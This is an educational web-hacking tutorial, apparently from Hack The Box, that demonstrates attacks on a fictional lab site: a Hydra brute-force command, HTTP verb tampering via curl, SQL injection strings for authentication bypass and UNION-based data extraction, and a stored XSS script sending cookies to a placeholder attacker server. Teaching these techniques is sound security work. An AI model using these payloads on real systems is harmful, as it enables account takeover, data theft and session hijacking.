Are you looking to learn how to protect the web or just want a more in-depth understanding of how attackers target web applications?
This guide will explore five hacking techniques, ranging from beginner to advanced levels. We’ll cover:
Before we start, it’s important that you note the following “do not try this at home” disclaimer:
These examples are for educational and informative purposes only, and are intended to provide insights into the methods attackers use to compromise website security.
If you want to try these techniques, always practice in a safe, controlled environment such as your local computer or on the Hack The Box (HTB) platform.
Now, let’s rock and roll.
Login brute force
A brute force attack is a trial-and-error approach to a certain feature or service. For our example, we will focus on a web application login. In this case, the application requires a username and password to allow access.
In this scenario, attackers can use a variety of approaches. We will focus on demonstrating what is known as a brute-force dictionary attack.
A typical dictionary brute force attack uses password lists, which are large text files containing thousands of common passwords gathered from years of data breaches.
To simulate our attack, we will use the popular “rockyou.txt” wordlist. But there are all kinds of reputable wordlists, such as the SecLists project, which is maintained by Daniel Miessler, Jason Haddix, and g0tmi1k.
We will conduct our attacks against the web application of the evil “g4rg4m3l”. Let’s help the Smurfs. Remember to always hack for good!
A common username found in all kinds of services and applications is “admin.” So that’s the account we’ll try to brute force.
First, we will check the admin username against the password testing.
As expected, we get back an Invalid username or password error message.
Now we’ll brute force the login with the user admin and the rockyou.txt password list.
We’ll use the Hydra tool to perform this attack from the command line. But, there are plenty of tools that can perform this attack, such as Burp Suite.
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f -vV g4rg4m3l.htb http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid username or password"
Use the:
-
-l option to specify the username.
-
-P for the password list.
-
-f to stop hydra on the first successful login.
-
–vV to see a verbose output and the string Invalid username or password, which corresponds to the unsuccessful login message.
As we can see, Hydra checked the passwords one by one until it found the one that corresponds to the user admin, which was password123.
Go ahead and say the line: “We’re in!”
This technique is considered suitable for beginners because it requires minimal skills.
To conduct this attack, attackers only need a basic understanding of how web applications work and proficiency with brute force tools like Hydra and Burp Suite.
Go deeper
Check out these HTB courses to learn more:
HTML verb tampering
Attackers are always on the lookout for indicators of poor security posture, such as the password for the “g4rg4m3l” website admin user.
These hints alert attackers that a certain web application can be further exploited due to a lack of security.
Upon further exploration, we come across the “G4RG4M3L’s Evil Plans” section of our example website, where he lays out several of his evil plans against the Smurfs.
Each plan includes a “Delete Plan” button. Let’s try to delete those evil plans.
It seems that despite his poor password choices, g4rg4m3l has some sort of protection against the deletion of his plans.
However, when we inspect these actions in the browser developer tools, we notice that the request is made using the DELETE HTTP method.
HTTP Methods (also called verbs) specify the type of actions a web server must perform for a particular request.
By manipulating HTTP verbs, such as changing DELETE to GET, an attacker can tamper with the functionality of a web application, leading to data manipulation and deletion on the server.
For our HTTP tampering attack against g4rg4m3l, we’ll change the DELETE verb to GET and send the same request using the cURL command line tool.
curl -X GET -d "evil_plan_id=666f1081b50c" http://g4rg4m3l.htb/evil_plans.php
-
The -X option is used to specify the HTTP verb.
-
We also need to identify the id of the plan we want to test, which we can obtain through HTML inspection or by selecting COPY DELETE DATA in the browser dev tools.
After we refresh the page, it becomes apparent that changing the HTTP verb led to the first plan’s deletion.
By tampering with HTTP verbs attackers can mess with the web application functionalities with potentially catastrophic consequences, such as deleting data.
Go deeper
Check out these HTB courses to learn more:
To perform these attacks, you’ll need a clear understanding of the HTTP protocol and how web applications work, as well as tools like browser developer tools and cURL.
SQL Injection
Let’s revisit the login section. For a simple authentication process, we can assume that the username and its corresponding password are stored in a database.
When the user enters their username and password, a verification process occurs on the backend to check if they exist in that database.
Attackers can take advantage of this process by inserting malicious Structured Query Language (SQL) statements into web form fields instead of the expected user input.
This type of attack, called SQL Injection, can manipulate the database, potentially access sensitive information, and even bypass authentication.
When a password and username exist in the database, an SQL statement will return true and authenticate that particular user.
However, if the application does not properly protect against these kinds of attacks, an attacker can directly input an SQL statement that always returns true, such as “OR ‘1’=1”.
This means the statement will always return true regardless of whether the username and password match and can bypass the authentication method.
These types of vulnerabilities can be further exploited and potentially lead to data exfiltration when the malicious code tricks the database into exposing information.
For our example, we’ll use the UNION SELECT id, username, password, email FROM users – query to try and access sensitive information on the database.
By injecting a UNION SELECT statement, we can append our own query to the original query, and potentially retrieve data from other tables.
By injecting our crafted query, we were able to retrieve information about the users stored in the application database.
We can use these credentials to access different user accounts in further attacks against the website.
It’s important to note that attackers need to follow several steps in order to create a functioning SQL statement.
💡Note: The methods and techniques used in these attacks can vary greatly based on the specific configuration and design of each database, due to the variety of ways databases can be configured.
Go deeper
Check out these HTB courses to learn more:
In addition to the previously mentioned skills, this website hacking technique requires familiarity with web application infrastructures, databases, and SQL.
Cross-site scripting (XSS) / cookie theft
Cross-site scripting (XSS) attacks are a type of injection web hacking technique where an attacker can insert malicious code into a web application.
These attacks usually happen when an application accepts user input without proper validation.
Cross-site scripting allows malicious code to be mixed with legitimate input. Ultimately giving attackers access to sensitive information, cookies, session tokens, and even the ability to modify the content of the web applications.
There are several kinds of XSS attacks. We will focus on what’s known as Stored XSS, which can obtain cookies from unsuspecting users.
Stored XSS is an attack where malicious code is permanently injected into a target, or “stored”, in the comment section of a blog, a post, or a message.
When we access the comment section of our target web application, we can input a malicious script that begins with a <script> tag.
This tag instructs the browser to run the enclosed JavaScript code. The script looks like this:
<script>var img = new Image(); img.src="http:/<attacker-IPaddress>:666/steal-cookies.php?cookie=" + document.cookie;</script>
Once executed, it creates a new image object that prompts the browser to send a GET request to a malicious URL.
When an unsuspecting visitor goes to the page, their browser will interpret the HTML and execute this code, which sends their cookie to the attacker’s URL.
With our XSS attack set, this is now a waiting game, as we’re waiting for visitors to visit g4rg4m3l’s page so we can get their cookies.
After a while, our attacker server captures a cookie from one of g4rg4m3l’s visitors. We’ll show you how to receive a connection back to our machine in our next example.
Go deeper
Check out these HTB courses to learn more:
To execute these attacks, you must have all of the previously mentioned skills as well as proficiency with programming languages like Python, PHP, and Javascript.
When web applications fail to validate user inputs, attackers can further exploit them to execute arbitrary commands on the host Operating System (OS) potentially compromising the system entirely.
Become a certified website hacking specialist
We have covered some common techniques for hacking websites from beginner to advanced levels:
Bear in mind that we made these difficulty classifications based on the varying levels of knowledge in different areas that a web app penetration tester must have.
The nature and complexity of web applications make each one unique. So an attack that we classified as “advanced” may actually be relatively easy to perform, if the web application has weak security. Similarly, a “beginner” level attack against a very secure website may be very complicated.
Understanding how attackers operate and learning the different techniques they use is crucial for protection and safety. We encourage you to explore all of the recommended modules and get hands-on practice.
Consider choosing a Job Role Path on Hack The Box Academy or cybersecurity certification.
These resources will guide you through the Academy modules, helping you develop practical skills and the necessary mindset for a particular job role, such as a pentester, web app security expert, or SOC analyst.
Stay safe, be ethical, keep learning, and rock n’ roll!
hackers.top from www.hackthebox.com